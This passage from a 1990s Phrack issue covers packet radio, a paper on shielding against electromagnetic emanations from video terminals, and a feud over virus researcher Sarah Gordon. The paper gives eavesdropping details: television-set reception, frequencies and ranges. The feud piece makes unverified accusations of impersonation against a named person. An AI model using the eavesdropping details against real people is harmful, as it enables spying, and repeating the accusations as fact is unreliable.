you contact her at the address " VIA AAAPPP." Unfortunately, ROSE does not have the widespread use necessary to make it a nationwide network. There are several other networking protocols in use, such as TheNet and a few others. However, I expect TCP/IP to replace most if not all competing protocols in a few years. ----------------- Packet Satellites ----------------- Here's something you won't see on Internet. Maybe some of Internet's traffic goes over satellites, but direct contact? Since 1959, amateurs have launched nearly 30 satellites into orbit. Nearly 20 of these are still in service -- and most of them are dedicated at least part-time to packet operation. >From a user's standpoint, there are two different types of packet satellite -- one type using 1200 bps FSK (frequency-shift keying) and the other using 9600 bps FM. The current population is split, with about a half dozen of each type. Most packet satellites, or pacsats, are based on a design from University of Surrey in Great Britain -- they're small and lightweight, keeping launch costs to a minimum. Pacsats are always launched as secondary payloads, and often ride as ballast to reduce launch costs even further. Many pacsats have on-board CCD cameras that can take pictures of Earth or space, and make the pictures available for downloading from the on-board BBS. Other pacsats carry equipment that allow them to be switched into a transponder mode, such as the Japanese FujiSat that carries SSB and CW (Morse code) contacts on Wednesdays, or can even be converted into an FM repeater such as AO-21. Some special software has been developed to make the most of the limited bandwidth. For example, pictures can take more time to download than is available during a single pass (normally 10-20 minutes), especially if other users are sending and downloading other files at the same time. The software, called PB, lets you download and upload as much of a file as possible during one pass, then gets the rest of the file on subsequent passes. Other software lets you automate the entire process, so you can get new files as they arrive without having to get up early for that 4 a.m. pass. PB also lets you download files by listening in -- if another person is downloading the file you want, you can simply listen to the downlink and let PB construct the file for you. This is a good way to save bandwidth; if two people want the same file, only one of them has to actually download it. If there are holes in the file, you can fill them in later. -------------------------------- Getting an Amateur Radio License -------------------------------- There are five grades of amateur radio licenses in the U.S.; from lowest to highest, they are Novice, Technician General, Advanced, and Extra. Each grade of license has a test on theory and regulations, with a Morse code "element" required for several of them. The good news is that 99% of what packet radio has to offer is available to the Technician. The better news is that the Technician license, as of January 1991, no longer requires you to learn Morse code. The "codeless Tech" has brought a great deal of new blood into ham radio, including many hackers and mainstream computer people. Study guides are available from Radio Shack and the American Radio Relay League (ARRL); the ARRL's guides are the better of the two, in my opinion. You can get ARRL study guides at most ham radio stores or directly from the ARRL. If you want to get a codeless Technician license, you'll need the Novice and the Technician study guides. The material isn't very hard to learn; anyone who can navigate the guts of Ma Bell will have no trouble with the Novice or Technician exams. :-) The ARRL can also provide you with a free schedule of exams in your area. The FCC some years ago turned over all testing to accredited amateur groups, so you should be able to find an exam at a time and place convenient to you. Many other ARRL services are available through an Internet mail server; send mail to info-server@arrl.org containing the line "send index" in the body of your message. If there's any bad news, it's that a group of diehards can't stand the idea of a code-free ham license. Some of these folks will go out of the way to hassle code-free hams. Fortunately, most of them are afraid of computers and don't do packet. Other things to watch out for -- the FCC frowns on profanity, intentional jamming, and encrypted data sent over the air. A small price to pay, in my opinion, for the opportunity to build and explore a worldwide network without the Secret Service breathing down your neck. -- end -- ==Phrack Magazine== Volume Four, Issue Forty-Four, File 10 of 27 **************************************************************************** [Editor's Note: This file is reprinted with permission of InterPact Press. The actual document contains many pictures, charts, and tables that due to our format, we were unable to reproduce. We encourage the reader to contact InterPact Press at 813-393-6600 and order a hard copy of the document for $25.00] ------------------------------------------------------------------------------- Protective Measures Against Compromising Electro Magnetic Radiation Emitted by Video Display Terminals by Professor Erhart Moller University of Aachen, Aachen, Germany 0. Introduction Compromising electromagnetic radiation emitted by machinery or instruments used in data processing or communication engineering can be received, decoded and recorded even across large distances. It is also possible to recognize the data or information which was processed and transmitted by the emitting instrument as text in clear. Compromising emitted electromagnetic radiation thus jeopardizes the protection and security of data. The Laboratory for Communication Engineering at the Fachhochschule Aachen is developing protective measures against compromising emission of radiation. However, these protective measures can only be effective if they are derived from the characteristics, the effects, and risks of compromising emitted electromagnetic radiation. Therefore we first consider only the forms of appearance and the characteristics of compromising emitted electromagnetic radiation. 1. Compromising Emitted Electromagnetic Radiation In this context one often refers only to the so-called computer radiation. But this is only one form of compromising emitted electromagnetic radiation. There are three types of such emissions. 1.1. Types of Compromising Emitted Electromagnetic Radiation Figure 1.1 shows an n example of an arbitrary electric device with various electric connections: a power supply line, a high frequency coaxial transmission line, and a coolant line with in- and outflux. This device emits three types of compromising electromagnetic radiation: 1. electromagnetic radiation in form of electric and magnetic fields and electromagnetic waves; 2. electromagnetic waves on the outer surface of all coaxial metallic connections (shell waves); 3. electric interference currents and interference voltages in power lines connected to the device. Each of the three types can be transformed into the other two. For instance, shell waves can be emitted as fields or waves. On the other hand, electromagnetic waves can be caught by a nearby conductor and can propagate on it as shell waves. These phenomena are the reason for the difficult control of compromising electromagnetic radiation, and they imply that one must deal with all and not just one form of compromising electromagnetic radiation. Also, electromagnetic protection against compromising emitted radiation must deal with all forms of it. 1.2. Examples of Compromising Emitted Electromagnetic Radiation To exemplify the three types of compromising electromagnetic radiation we consider the monitor depicted in figure 1.2. 1.2.1. Compromising Electromagnetic Radiation Figure 1.3. shows the experimental set-up. The video display terminal is connected via the power line to the power supply. The power line is surrounded by absorbers so that the terminal can only emit electromagnetic radiation. The absorbers prevent the generation of shell waves on the power line. The dipole antenna of the television receiver is 10 m from the video terminal. Figure 1.4. shows the screen of the television receiver after it received and decoded the signal. Not only is the large FH=AC well readable but also the smaller letters. This demonstration yields the following results: * The video display terminal emits electromagnetic radiation; * Despite being within (standards committee) norms the emitted electromagnetic radiation can be received and decoded across a certain distance; * The electromagnetic radiation emitted by the terminal can be decoded into readable information and symbols on a television screen. Therefore, this emitted radiation is compromising. 1.2.2. Compromising Surface or Shell Waves The video display terminal and the television receiver are positioned as in figure 1.5. The power line of the terminal is surrounded by a current transformer clamp which absorbs the shell waves. The television screen shows again the picture seen in figure 1.4. The quality of the picture is often better than in the previous case. Another experiment would demonstrate that secondary shell waves can form on a nearby conductor. The emitted radiation is then caught by nearby conductors and continues to propagate as shell waves. These emissions also give good receptions but are almost uncontrollable along their path of propagation. 1.2.3. Demonstration of Compromising Emitted Radiation Through the Power Line Figure 1.6 shows the experimental set-up for the proof of compromising power supply voltages. The video display terminal acts as a generator whose current and voltage is entered into the power supply. Using a capacitive line probe, the entered signal can be retrieved and fed into the television receiver. This form of transmission is the known basis for intercom systems or so-called babysitter monitors where the signals are transmitted from room to room via the energy supply lines in a home. As in the case of electromagnetic radiation or shell waves, one obtains the same picture quality as in figure 1.4. 2. Facts About Compromising Emitted Radiation Protective measures against compromising emitted radiation are not only determined by the above-mentions\ed three types of compromising emissions but also by taking into account the following data: # level of intensity and spectral distribution; # frequency (emission frequency) and frequency range; # directional characteristics of the radiation. These data can then be used to derive the damping and the amplitude-frequency response for the protective measure and its location. 2.1. Emission Spectrum and Level of Intensity The spectral distribution of compromising emitted radiation depends on the frequencies used to generate the picture on a screen. The regular repetition of dots and lines gives rise to the video and line frequency which is found in the spectrum. However, the emission of video or line frequencies is not compromising since their knowledge does not yet give access to processed data. If the lines are covered regularly by symbols, a symbol frequency is obtained which is also detectable in the spectrum. A single symbol consists of a dot or pixel matrix. The dot matrix of the symbol @ is also known in figure 2.1 The electron beam scans the individual dots or pixels line-by-line and keys them bright or dark. This keying is done using the so-called dot or pixel frequency. For instance, the highest keying frequency is obtained by scanning the center of the @ symbol since there one has a long sequence of successive bright and dark pixels. It also follows from figure 2.1 that the keying is slower, i.e., the keying frequency is lower, along the upper part of the @ symbol because of a long sequence of only dark or bright pixels. It follows that the emissions due to the keying frequency are highly compromising since they give direct information about the structure of the picture. Until recently, the frequencies in the following table were used: video frequency 45 Hz - 55 Hz line frequency 10 kHz - 20 kHz symbol frequency 2 MHz - 5 MHz dot or pixel frequency 15 MHz - 20 MHz. The pulses for the electron beam are formed in the video part, i.e., the video amplifier, of the monitor. Therefore, the cathode-grid of the picture tube and the video amplifier are the main emitters of radiation. The upper diagram in figure 2.2 shows the calculated spectrum for the cathode-keying. It represents a sequence of dots from the center of the @ symbol using a dot-sequential frequency of 18 MHz. The diagram in the center of figure 2.2 shows the measured spectrum at the keyed cathode of the picture tube. The agreement between the calculated and measured spectrum for the frequency is clearly visible. However, the calculated and measured spectral representation differ in the form of the envelopes. In the measured spectrum one finds an amplitude increase between 175 MHz and 225 MHz. This increase is usually found in the same or similar form in monitors. The reasons for this amplitude increase are design, construction parts, and dimensions of the video display terminal. In the lower part of figure 2.2 we see the compromising radiation emitted by the terminal as measured at a distance of 10 m. The spectrum of the radiation emitted by the terminal is superimposed by broadcast, radio and interference spectra since the measurement took place on open ground. Despite this interference one can recognize the typical form of the cathode spectrum. The increase in the amplitude between 175 MHz and 225 MHz presents a particular risk since the television transmitters for Band III operate within this frequency range and all television sets are tuned to it (see figure 2.2). A comparison of the intensity level of the television transmitter with the level of the compromising radiation in figure 2.2 shows their agreement. It is therefore not very difficult to receive the compromising radiation in proximity of the emitter using only a regular television set with normal sensitivity. Figure 2.3 shows the spectral distribution of compromising shell waves emitted by the video display terminal. Here again one recognizes the particular form of the dot or pixel frequency. The height of the shell wave spectrum is much lower at higher frequencies than the height of the radiation spectrum. The shell waves have lower intensity in the range of broadcast television but higher intensity in the range of cable television. To receive the shell waves a television set must be cable-ready. Figure 2.4 shows the spectrum for the third type of emission: the compromising currents and voltages entering the power supply lines. It is very similar to the shell wave spectrum. The height of this spectrum at higher frequencies is even smaller than the shell wave spectrum. In order to receive any signal a cable-ready television set must be used. The intensity of the currents and voltages is so high that they can easily be received using a regular television set with normal sensitivity. 2.2. Frequency and Frequency Range It follows from figures 2.2, 2.3, and 2.4 that the best reception for the three types of emissions is for the following frequencies: compromising radiation approx. 200 MHz; compromising shell waves approx. 60 MHz; compromising voltages approx. 20 MHz. The video information of the picture on the monitor has a frequency range of half a spectral arc. The frequency range of the receiver must therefore be 10 MHz for all three types of emission. 2.3. Directional Characteristics of the Radiation Figure 2.5 shows the directional characteristics for compromising radiation emitted by a video display terminal inside a plastic casing. According to this diagram the lateral radiation dominates. The field intensity along the front and back direction is about 30% of the lateral intensity. The power of the emitted radiation along these directions is only about 10% of the power emitted laterally. The range for the emitted radiation along the front and back direction is therefore also reduced to 30%. This phenomenon suggests for the first time a protection against compromising radiation, namely proper positioning of the device. The compromising shell waves and power line voltages propagate according to the configuration of the lines. There is no preferred direction. 2.4. Range The range of compromising radiation emitted from a video display terminal is defined as the maximum distance between the emitting terminal and a television receiver and readable picture. The range can be very different for the three types of emitted radiation. It depends on the type of emitter and the path of propagation. The spectacular ranges for emitted ranges are often quoted - some of which do not always come from the technical literature - give in general no indication just under which conditions they were obtained. It is therefore meaningful to verify these spectacular ranges before using them. 2.4.1. The Range of Compromising Emitted Radiation The dependence of the field intensity on distance is illustrated in figure 2.6. The dependence of the range on the receiver used is shown at 25 m, 40 m, and 80 m. The field intensity at 25 m is just strong enough to receive a picture with an ordinary television receiver using the set-up in figure 1.3. If one uses a narrow-band television antenna or a noiseless antenna amplifier than the field intensities at 40 m and 80 m, respectively, are still strong enough to receive a legible picture. The flattening out of the curve at large distances suggests that the range can be increased to several hundred meters by using more sensitive antenna or better receivers. The range can also be increased through a high altitude connection, for instance, if both emitter and receiver are in or on a high rise. This was verified by an experiment involving two high rises separated by over 150 m. A very clear picture was received using a relatively simple antenna with G = 6 db. 2.4.2. Range of Compromising Shell Waves Measurements have shown that shell waves can propagate across a large area without any noticeable damping if only the surrounding metallic conductors extend also across the entire area. The propagation is reduced considerably by a metallic conductor that crosses metallic surfaces such as metal walls or metallic grids such as reinforcements in concrete walls. Dissipative building materials also damp shell waves. Lightweight construction such as the use of dry walls or plastic walls in large buildings increases the range of shell waves to about 100 m without the picture becoming illegible. 2.4.3 Range of Emissions Through Power Supply Lines In this case the conditions are even less clear than in the previous cases. It must be assumed that inside a building the compromising currents and voltages can be received through the phase of the power supply lines feeding the video display terminal . The possibility of receiving the signal through other phase lines by coupling across phases in the power supply line cannot be excluded. The range depends very much on the type of set-up and the instruments used. It is conceivable that a range of about 100 m can be obtained. 3. Protective Measures Protective measures fall into three categories: - modification of devices and instruments by changing procedures and circuitry; - heterodyning by noise or signals from external sources; - shielding, interlocking, and filtering. 3.1. Instrument Modification The instrument modifications consist of changing the signal processing method and the circuitry of the instrument. It is the objective of these measures to alter the spectral distribution and intensity of the emitted radiation in such a way that the reception by television sets or slightly modified television sets is no longer possible. For instance, a change of procedure could consist of a considerable increase in the dot or pixel frequency, the symbol and line frequencies. A reduction in the impulse amplitude and impulse slope also changes the reduction in the impulse slope also changes emission spectrum so that reception is rendered more difficult. However, the subsequent modification of the video display terminal has serious disadvantages of its own: First of all, the user of video display terminals does in general not possess the personal and apparative equipment to perform the modifications. To complicate things further, the so-modified instruments loose their manufacturer's warranty and also their permit of operation issued by governmental telecommunication offices. A subsequent instrument modification by the user is for these reasons in general out of question. 3.2. HETERODYNING STRATEGY We refer to a protective measure as a heterodyning strategy whenever the compromising emitted radiation is superimposed by electromagnetic noise of specific electromagnetic signals. The television set receives the compromising emitted radiation together with the superimposed noise of spurious signal. The noise or the spurious signal are such that a filtering out or decoding of the compromising emitted radiation by simple means is impossible. Since the noise and the spurious signal not only interfere with the television receiver of the listener but also with other television sets in the vicinity the heterodyning strategy is by all means in violation with the laws and regulations governing telecommunications. As far as is known, this is a protective measure only used under extremely important circumstances involving high government officials. 3.3 Shielding In contrast to the previously considered protective measures, shielding has two important advantages: * shielding protects not only against compromising emitted radiation but also against electromagnetic emissions which can enter data processing devices from the outside and cause interference; * furthermore, shielding neither violates the laws governing the use of telecommunications nor does it jeopardize the manufacturer's warranty. The term shielding is used here to describe, shielding, interlocking, and filtering. 3.3.1. Shielding Data The requirements on a shield are described by the shield damping. The shield damping is twenty times the logarithm of the ratio between the electric or magnetic field intensity inside the shield and outside the shield. Actual applications and individual situations may require different values for the shield. The shield data are derived from the so-called zone model. In the zone model one considers the type and intensity of the emitted radiation, the composition of the path of propagation, and the local accessibility for the receiver. The shield data not only influence the shield damping but also the frequency range of the shield's effectiveness. Figure 3.1 shows a diagram listing different types if shields according to regulations MIL STD 285 and 461B, NSA 656, and VG norms 95 375. 3.3.2. Applicability of Shielding Electromagnetic shielding can be used on emitting or interfered with instruments, on building and rooms, and on mobile cabins. 3.3.2.1. Shielding of Instruments The shielding of instruments though it can often be done very quickly and effortlessly is not without problems. In general but especially after subsequent installation, it can lead to a loss in design and styling of the shielded device. Openings in the shield, for instance for ventilation or control and operating elements, cannot always be sealed off completely. In this case they are emission openings with particularly high emission rates. Trying to maintain ergonometric conditions - good viewing conditions for the users - renders the shielding of screens especially difficult. If the casing of the instruments is not made of metal but of plastic, the following shielding materials are considered: metal foils, metal cloth, metal-coated plastics, electrolytical layers and coats of metallic paint or paste. Recently, the plastics industry is also offering metallized plies of fabric. Such glasses are for instance offered by VEGLA, Aachen. Ventilation openings are sealed off with metallic fabric of honey-comb wirings. Interlocking systems and filters on all leads coming out of the instrument prevent the emission of compromising shell waves and power supply voltages. 3.3.2.2. Building and Room Shielding There are some advantages in shielding buildings and rooms. The building and room shielding lies solely in the competence of the user. Minor restrictions dealing with the static of the building and local building regulations only occur with external shielding. Building and room shielding offers a protection that is independent of the instrument or its type. It is a lasting and effective protection. Maintenance is minimal, and subsequent costs hardly exist. Interior design and room lay-out are not changed. If one requires better shielding values or a building and room design which emphasizes better comfort than greater expenses and thus higher costs will occur. 3.3.2.3. Cabin Shielding Cabin shielding has all the advantages of building and room shielding. In addition, cabin shielding is not affected by the static of the building or local building regulations. Furthermore, cabin shielding requires less expenses and costs than building or room shielding. However, shielded cabins do not offer the same comfort or interior design as shielded buildings or rooms. 3.3.3. Shielding Components Electromagnetic shielding consists of three components: # the actual shield together with various structural elements as a protection against emitted radiation; # the interlocking of all non-electric and electric supply lines to protect against shell waves; # electric filters at all supply lines to protect against compromising power supply voltages. 3.3.3.1. The Electromagnetic Shield The shield consists of the hull and the shielding structural elements. 3.3.3.1.1. Shield Hull - Method and Construction In general, one uses metal sheets or metal foil to construct electromagnetic shields for buildings and rooms. If one lowers the requirements on the shield damping and the upper limit frequency then screen wire, metallic nets, and - if properly constructed - even the reinforced wire net in concrete can be used; the obvious disadvantage is that the settlements or movements of the building can cause cracks that will render the shield ineffective. Therefore, only metal shields or strong wire netting is used for the construction of electromagnetically shielded cabins. The building or room shield can be built using several construction principles. Figure 3.2 above shows the essential construction principles. For the Sandwich construction, the shield is between the outer and inner layer of the wall. A new type of construction uses the Principle of the Lost Form. The shield itself which consists of 3 to 5 mm thick sheet iron is used as an inner layer in the manufacturing of concrete walls. The sheets touch one another and have to be welded together at the contact points. If the building or room shields he\ave to satisfy a special purpose then they have to be grounded at only one point; they have to be assembled in such a way that they electrically insulate against the building or room walls. The so-called inner shields offer this protection. In simple cases, the inners shield is placed on top of the walls maintaining insulation by using a special underneath construction. However, this space-saving and simple construction has a disadvantage; the part of the shield that faces the wall such as corrosion, settling or moving of the building, or damages due to work on the exterior of the building can no longer be detected. The use of non-corrosive shield material or sufficient back ventilation of the shield protects against corrosion in these cases. The self-supporting inner shield is suspended from a supporting grid construction. This construction can be similar to a cabin construction. In the case of large rooms, such as halls, one should use a truss for statistical reasons. The self-supporting inner shield has the advantage of accessibility, although the usable room volume has been decreased. In rooms where the shield is exposed to only slight mechanical wear and tear and not required to shield completely, shielding metal foil is glued directly to the wall and welded at the contact points. The floor construction is almost the same for all four construction principles. It is important that the floor onto which the shield is placed is protected from humidity and is even. In the case of electrically insulating layers of, for instance, laminated paper or PVC are first put on the floor. The ceiling construction depends on the specific requirements and necessities. The ceiling shield can be a suspended metallic ceiling or a self-supporting ceiling construction. 3.3.3.1.2. Shield Construction Elements Construction elements which seal off viewing openings or access openings are called shield construction elements. Access openings are doors, gates, and hatches. Viewing openings are windows. The shielded doors, gates, and hatches serve two purposes: first to close off the room, and second to shield the room. The door, gate, or hatch shield is in general made of sheet iron. Passing from the door or gate shield to the room shield causes shield-technical problems. A construction which is due to the company of TRUBE & KINGS has proven to be especially effective for this kind of problem (see figure 3.3). The set-on-edge door shield, the so-called knife, is moved into a U-shape which contains spring contacts. The difference between this and other available constructions is that the knife is not moved into the spring upward. This construction reduces the wear and tear of the transition point between door and room shield and thus increases the durability of the construction which implies a better protection and higher reliability. This construction by TRUBE & KINGS satisfies the highest requirements on shield damping. Windows in shielded room are sealed off with the shielding glass or so-called honey-comb chimneys. It si understood that these windows are not to be opened. Figure 3.4 shows the cross-section of a glass especially developed by VEGLA for data processing rooms. The glass consists of multiple layers which are worked into a very fine metallic net and an evaporated metallic layer. The thickness of the wire is in the range of a few micrometers so that the net is hardly visible. This glass can also be manufactured so that it is rupture- and fire-resistant and bullet-proofed. Using glass one can reach shield dampings in the medium range (refer to figure 3.1). Specially manufactured glass reaches even higher shield dampings. Figure 3.4 also shows the so-called honey-comb chimneys as manufactured by SIEMENS. Visibility and the comfort of light are highly restricted. But the advantage is that this type of shielding satisfies the requirements for highest shield damping. 3.3.3.2. Interlocking All non-electric supply lines leaving a shielded room must be interlocked in order to protect against the propagation of shell and surface waves. Water pipes, heating pipes, pneumatic and hydraulic pipes are connected via rings to the metallic shield. Depending on the required frequency range, the pipe diameter is also subdivided by filter pieces. At high frequencies on can achieve dampings of up to 100dB using such interlocking devices. The ventilation of shielded rooms may cause problems. Problems will occur if shield dampings up to the highest frequencies are required. In this case one has to use two-step ventilation filters. The first step consist of adding concave conductor filters which work for the frequencies up to 200 GHz, the second step of adding absorber filters which protect against compromising emitted frequencies above 200 GHz. Figure 3.5 shows the set-up for the above-described ventilation lock which is due to the SCHORCH. 3.3.3.3. Electric Filters Filters must be put on electric power supply lines, telephone wires, and data processing supply lines at the room exit point. The filters have to be installed at the shield. The filters used here are the same as the ones shown in the area of electromagnetic compatibility. 4. Summary Electric devices used in data processing, data transmission and data handling emit electromagnetic radiation, electromagnetic shell and surface waves, and currents and voltages in power supply lines, telephone wires, and data supply lines. If this emitted radiation carries actual data or information from the data processing device then it is compromising. Using a television receiver, it is very easy to receive, decode and make these compromising emissions legibly. Several possibilities present themselves as protective measures against compromising emissions from data processing and data transmitting equipment. The use of shielding in the form of room shields, interlocking of supply lines, and filters for electric lines is the best protection for the user of data processing, data transmitting, and data handling equipment. ==Phrack Magazine== Volume Four, Issue Forty-Four, File 11 of 27 **************************************************************************** [Editor's Note: The following two files are very interesting. I never paid ANY attention to the realm of our community that focus on virii. For some reason, the whole idea behind them is a novel concept, but I never saw any reason to take notice of them. Even when I've given lectures, I always leave discussion about virii out, since they should be a moot point. I mean, when "fdisk /mbr" will take care of so many problems, what's the big deal? I know I'm over-simplifying things, but jesus... Well, while I continued to overlook this small but earnest group of folks who dabble in virii, all kinds of things began to happen. Groups formed, rivalries flared, paranoia ran rampant and one of the most ridiculous cottage industries in the history of personal computing appeared (living on the spread of Fear, Uncertainty and Doubt.) Well, in all of this several names have popped up as potential threats to this little world. One in particular, Sarah Gordon, even got the spotlight as a paranoid, BBS-busting, hacker-bashing psychopath in a rather ill-researched and hastily prepared Phrack piece a few years back. It is rather odd that in all the hype we in the underground drum up, no one ever bothers to get the other side of the story, so we feed the fervor and continue the paranoia. Well, with this in mind, I received a file claiming to have info regarding the big "expose" of Sarah masquerading as the Dark Avenger. Now, even a moron like me has heard of the Dark Avenger, so I read it. After doing so, I wanted to pipe it to /dev/null, but then decided it would be much more fun to send it to Sarah too, and let her respond to it. It's amusing as hell, and just goes to show that the underground has as many similarities in its distinct groups as it does differences.] ----------------------------------------------------------------------------- Sara(h?) Gordon AND THE DARK AVENGER SCAM. By Kohntark In one of my many online conversations with Sara Gordon I once asked her about the validity of the VNI interviews and her real relationship with the alleged dark avenger; after logging into her VFR BBS and seeing a #2 (hers being #1) account named after him. I proceeded to leave a message for the dark avenger there, claiming that the whole account was bogus as it is highly improbable that this person might call all the way from Bulgaria and log into a mediocre BBS just to chat with her, considering the expense of such long distance call , the economic situation in Eastern Europe and a fact that would learn later: Sara(h) Gordon has an account on the Bulgarian DIGSYS unix server, locally accessible by phone from there! As it was expected, Sara(h) quickly 'noticed' my personal message to the dark avenger and replied to my questioning in a public post in FIDONET, (I don't read FIDONET posts and she knows I have no access to them!!!! ) She claimed that the dark avenger was fully aware of how much money she made out of the VNI interviews and that she was in touch with him, etc.etc. Afterward, I questioned her again about the whole affair and demanded a proof, or some sort of direct contact from the dark avenger to my anonymous internet account. Since this was the first time anyone had ever questioned the validity of her relationship with the DA, she took this to heart and shortly after, I received 3 short messages originating from an Internet connected UNIX system in Bulgaria. Here they are: (Private, compromising parts are X'd out) 1st Message: -------------------------------------------------------------------------------- - From daemon@digsys.bg Wed Jul 14 19:07 EDT 1993 Received: from danbo.digsys.bg by XXXXXXXXXXXXXXXXXXXXXX; Wed, 14 Jul 93 19:07:3 4 -0400 Return-Path: Received: by XXXXXXXXXXXXXX (5.67/1.35) id AA12850; Thu, 15 Jul 93 02:04:46 +0300 Message-Id: <9307142304.AA12850@XXXXXXXXXXXX> To: XXXXXXX From: dav@danbo.digsys.bg Date: Wed, 14 Jul 93 23:41:36 +0300 Subject: No subject Status: RO kohntark- i just talked to a friend of mine who said you dont like her user log. why shouldnt i call her from bulgaria? i call whoever i want to, and this is not your problem. by the way, she sent me your mail. for your information, i do know how much money she made of that interview. and i also think that this is none of your business. also, maybe it would be good for you to know, that by offending her, you are offending me, too. keep this in mind. Second Message: ------------------------------------------------------------------------- >My mail with her is none of your business either. i dont think so, dude. maybe you need to read the next few lines again, in case you missed them. >> >> also, maybe it would be good for you to know, that by offending >> her, you are offending me, too. keep this in mind. >> >> > >HA HA! and you expect me to believe that you are the DA! >send me a proof: an email address from bulgaria or tell me >how many addressing modes does the MTE have? > >nice try. well, what do you think the domain .bg in my email address stands for? maybe you think its kameroon? as for the mte, im not giving you any info. i need not prove anything to anybody, and certainly dont plan to waste more of my time talking to you. you have been warned. Third Message: ------------------------------------------------------------------------- oh, yeah. sure it did. only you will not know where something else came from, when it knocks on your door. i have nothing more to say. ------------------------------------------------------------------------- In my ignorance, I blindly trusted the three cryptic replies to be true, even thought whoever replied refused to give out trivial information such as the number of addressing modes for a 2 year old encryption engine (MTE) and spelled Cameroon with a 'k' (Check out Sara Gordon's spelling of URUGUAY in VIRUS-L Volume 6 Issue 120 -v06i120) Shortly after other unrelated discussions and a CUD post from Sara(h) in which I was mentioned (unnamed), someone warned me of several posts in NUKENET by an alleged dark avenger and Todor Todorov from an account belonging to the last, mentioning me and Aristotle. In those messages I was referred to as 'hotshot,' a word that Sara Gordon had used on me several times on our personal email exchange; It was then that I became highly suspicious of the whole matter. I called Virginia's Virus Research Institute's sysop and owner, Aristotle to find out more about the posts and he bought to my attention the particular writing style of Sara(h) Gordon: She NEVER uses capital letters and apostrophes on her personal email, and always signs her name on the lower left hand corner. (She seldom signs her posts nowadays and changes her user name in her vfr@netcom.com account every week!; for further proof of her writing style, please refer to public posts in VIRUS-L Volume 6 #120; I also have over 100K of personal email exchange to prove this fact!) It was then that we realized that she was passing herself as Todor Todorov and the dark avenger (who could possibly verify their online identity?) and had infiltrated NUKENET.. The writing style described corresponds exactly to the one on the posts I received from the 'dark avenger.' Shortly afterward the account was cancelled and I learned the whole truth: The danbo.digsys.bg Bulgarian site belongs to Daniel Kalchev, another self appointed AV researcher whose best claims to fame are submitting various Bulgarian viruses to Patricia Hoffman's VSUM!! (You can check this by doing a search on 'Kalchev' on the current VSUMs or you can contact him thru: ) He is a very close friend of Sara(h) Gordon and he has an account in her VFR BBS (you can check this by logging into her system and checking the user list) and SHE has an account in digsys.bg under (this account is still valid as far as I know; notice the H after her name!) What I concluded is that is the DA would never get an account in such system as he HATES Daniel Kalchev!!!! This is what really happened: Sara(h) Gordon in her desperation to prove that she was in touch with the dark avenger, told her pal Daniel Kalchev to make an account under the dark avenger's name ( this is how she always refers to him, even though he never signs his name that way (check the source code for his 'Dark Avenger' virus or the 'Commander Bomber' virus message name: [DAME]) From there she could email me messages that would come from Bulgaria and would be untraceable since she would log into her account in digsys.bg and log into the account internally from the same site in Bulgaria. (You can check where and when most of the people log from in most internet unix and vax sites) As it is expected from her, she has denied any of this. Some of her ridiculous explanations include things like "hotshot is a very common English word in Bulgaria" !!! You might ask yourself what is the deal with the h? is it sara or sarah?? Well, I asked her the same question when I noticed this in one of the VNI interviews, where her name is spelled as Sarah. She replied that this was a mistake of the publisher. Mistake? well not really, it was another lie, meant to throw off any information and truth seekers, for example you can check her account in Daniel Kalchev's system: , spelled with an H, another 'mistake of the publisher?' :) Other countless Sara Gordon lies are told in NUKE Info- Journal # 6. This behavior puts in question the validity of the VNI interviews and the reputation of Sara(h) Gordon as a serious (self appointed) 'virus researcher' IMHO the VNI interviews are a complete fabrication, meant only to boost her validity as a 'journalist', and to make her lots of money, charging for further 'interviews' to other magazines. (She has offered her paid 'interviewing' services to various other publications.) To the best of my knowledge the information I present here is true and can be checked. I chose to publish this information, despite threats against my well being and countless lies about me propagated by Sara(h) Gordon. I am doing this to stop the lies and corruption fostered by the Anti-Virus industry. ==Phrack Magazine== Volume Four, Issue Forty-Four, File 12 of 27 **************************************************************************** Sarah Gordon's Response Greetz and Salutations :) Thank you for giving me the opportunity to contribute to Phrack. While we may not agree on everything, I appreciate the chance to speak for myself. In the past, as many people now know, I have not had the opportunity to do so. My philosophies and ideals are quite similar to your own, and I hope that my response to this "Article" will help shine a bit of light on what is really going on here. I don't really want to spend too much time on it, because it is, as you said, obviously a personal attack. But, on the other hand, such nonsense can grow to the point where it has an effect. Perhaps a backlash on the programmers and hackers in Bulgaria, which of course will spread to the United States. They have suffered a lot of persecution because of the past malicious and irresponsible acts of some of their virus writers. Since Dark Avenger stopped writing viruses, their reputation has improved somewhat. David Briscoe recently wrote: "Computer hackers in former communist countries, including an elusive Bulgarian known as the Dark Avenger, are creating mischievous and sometimes costly viruses that threaten computers around the world". Following a recent interview I conducted with Dark Avenger, I was chastised for not making his identity known so he could be 'made to pay'. In "Discover" Magazine, writers Paul Mungo and Brian Clough are quoted from their book 'Approaching Zero' "the Mutating Engine...the most dangerous virus ever produced". This is so stupid, especially considering the thing does not replicate. It's a tool that can be used to perform encryption. Well, decryption too, but explanation of how it works aren't the point here, suffice to say it's not "the most dangerous virus ever produced". If people are going to rely on the media as an information resource, the media owes it to us to provide us with accurate information. However, this is simply not always the case. If you consider the actual viruses commonly found -in the wild- (that is, by computer users such as those from universities, corporations, etc.), the number of Bulgarian viruses -directly- impacting the users is a very insignificant number. For some reason, the media likes to play up Bulgaria as the big force behind the destruction of data! I personally don't have an interest in the economy of Bulgaria or any other country, but the media sure likes to use this kind of "information" to sell their own particular brand of fear. No more fear. Fear is a bad thing. It is one of the things that leads us to have government intervention into areas of our lives where it is definitely not desired. Sara(h?) Gordon AND THE DARK AVENGER SCAM. By K$hntark In one of my many online conversations with Sara Gordon I once asked her about the validity of the VNI interviews and her real relationship with the alleged dark avenger; after logging into her VFR BBS and seeing a #2 (hers being #1) account named after him. Of course his (Dark Avenger) name was #2 there. I put it there for him. His last call to my BBS was July 31, 1993 at 1:55 p.m. However, this was not the start of this business with Kohntark. He had been mailing me for about one month. From an account using the address of cxxxxx.ic.xxxxxx.edu. Keep this address in mind. It will come in handy later. I am not exactly sure of the date of the first message, but I think about one month. He had been reasonable enough at first, but he became increasingly agitated. Since he felt it was appropriate to include personal mail from Dark Avenger to him here, I think I can go ahead and illustrate for you some of his "hacking" :) (well, if you can call it hacking. you decide). (OH GOD, LOWER CASE...LeTZ SeE...) I proceeded to leave a message for the dark avenger there, claiming that the whole account was bogus as it is highly improbable that this person might call all the way from Bulgaria and log into a mediocre BBS just to chat with her, considering the expense of such long distance call , the economic situation in Eastern Europe and a fact that would learn later: Sara(h) Gordon has an account on the Bulgarian DIGSYS unix server, locally accessible by phone from there! This guy doesn't seem to know much about the "economic situation in Eastern Europe". At least, about Dark Avenger's personal economic state:) or mine. Maybe Dark Avenger could call digsys, but I certainly couldn't when I first started talking to him. I didn't have any internet 